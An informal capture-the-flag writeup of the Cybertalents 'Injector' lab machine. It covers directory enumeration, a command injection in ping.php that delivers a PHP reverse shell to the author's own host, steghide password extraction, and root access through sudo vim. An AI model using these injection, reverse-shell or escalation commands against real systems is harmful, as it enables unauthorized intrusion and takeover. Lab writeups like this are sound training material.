omakmoh@home:~$

Cybertalents Injector Machine

Hello, I’m Omar! i hope y’all safe and still following me after my last writeup xD Today i’ll share with you my writeup for Injector Machine from Cybertalents.

First of all, you should connect to CyberTalents VPN , You will see the instructions in the file given.

I’ll start with the enumeration.

Hmm, we find port 22 opened for ssh, and 80 for http(web server) running under Apache/2.4.29

let’s Discover the webserver….

Sorry for my weak machine :”

We’ll See a Default Apache page it’s automatically generated when you install apache.

Nothing got my attention or interested , let’s discover the hidden directories & file using dirsearch

using dirsearch -u http://172.24.170.117/ -e * we will get this result

the secret directory is interesting,

let’s open the directory in browser

nothing interesting, let’s discover what’s on using same command-line.

when i found admin.html i stopped the tool i go admin.html and said finally then the page loaded :)

i run the tool again and let the tool complete the scan :D

i went to all directories and found /tools didn’t troll me in /tools i found “ping.php”

before i join i was know it’s will be a Command Injection Vulnerability Okay open the php page, we will see input if we put 127.0.0.1 and click lookup the server will ping the ip. It’s so simple, let’s get a quick reverse shell. i’ll using php for reverse shell and my command is 127.0.0.1; php -r '$sock=fsockopen("172.24.143.xx",1337);exec("/bin/sh -i <&3 >&3 2>&3");' before you execute the command we should make a netcat listener first. and then click lookup in the web-page Okay, we now got a reverse shell.

Firstly Let’s spawn a terminal i don’t know why but i do it, using python3 -c 'import pty;pty.spawn("/bin/bash")';

now we’re on www-data we should get a user, after 2 days of trying & search i back the photo i found in /var/www a jpg photo called TrollFace.jpg.

let’s copy it to our machine using This netcat method

Transaferd.

i tried to use strings in the image but useless, i tried steghide extract -sf TrollFace.jpg without passphrase and it worked ! Lets cat the file

we got a password, lets see our users. just cat /etc/passwd and We will see user alex,

Let’s switch user to alex using ‘su’ and use the password we got from TrollFace.jpg

Best Part,

Let’s do Some Privilege Escalation, Firstly i do sudo -l for show the commands runs with root permissions,

Vim works with Root permissions, Here we go after ask my friend ‘Hameed’ he gave me this command and it’s works well. Thank you!

sudo vim -c ' : ! /bin/sh ' /usr/bin/vim

We got a root shell!

Thank you for reading,any questions? contact me on facebook!